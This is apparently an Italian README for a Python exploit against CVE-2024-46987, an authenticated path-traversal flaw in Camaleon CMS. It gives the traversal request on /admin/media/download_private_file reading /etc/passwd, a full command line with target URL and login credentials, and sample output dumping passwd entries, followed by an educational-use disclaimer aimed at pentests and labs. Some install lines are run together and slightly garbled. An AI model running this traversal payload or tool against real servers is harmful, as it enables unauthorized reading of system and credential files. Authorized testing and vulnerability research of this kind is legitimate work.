
Exploit creato con Python
CVE-2024-46987 è una vulnerabilità di path traversal autenticato (CWE-22) in Camaleon CMS (un sistema di gestione dei contenuti basato su Ruby on Rails). Consente a un utente autenticato (anche con privilegi bassi) di leggere file arbitrari sul server tramite l'azione MediaController#download_private_file.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:NUn attaccante con credenziali valide può inviare una richiesta appositamente costruita a: /admin/media/download_private_file?file=../../../../etc/passwd
pip install -r requirements.txtOPPURE
pip install -r requests firepython cms-exploit.py \
--url http://target.local \
--username neal \
--password 'Caffery@123' \
--cmd /etc/passwd
[+] Login riuscito
[*] Richiesta in corso: http://target.local/admin/media/download_private_file?file=../../../etc/passwd
[+] Successo – contenuto:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
.
.
Nota: Lo script presuppone un modulo di login in stile Rails (user[email], user[password], authenticity_token). Regola i campi del payload se il tuo target utilizza nomi personalizzati.
Questo strumento è fornito esclusivamente a scopo educativo e per test di sicurezza autorizzati.
Utilizzalo solo su sistemi di tua proprietà o per i quali hai un esplicito permesso scritto di test (ad esempio, programmi bug bounty, pentest interni, laboratori come HTB). L'uso non autorizzato potrebbe violare leggi. L'autore non è responsabile per un uso improprio.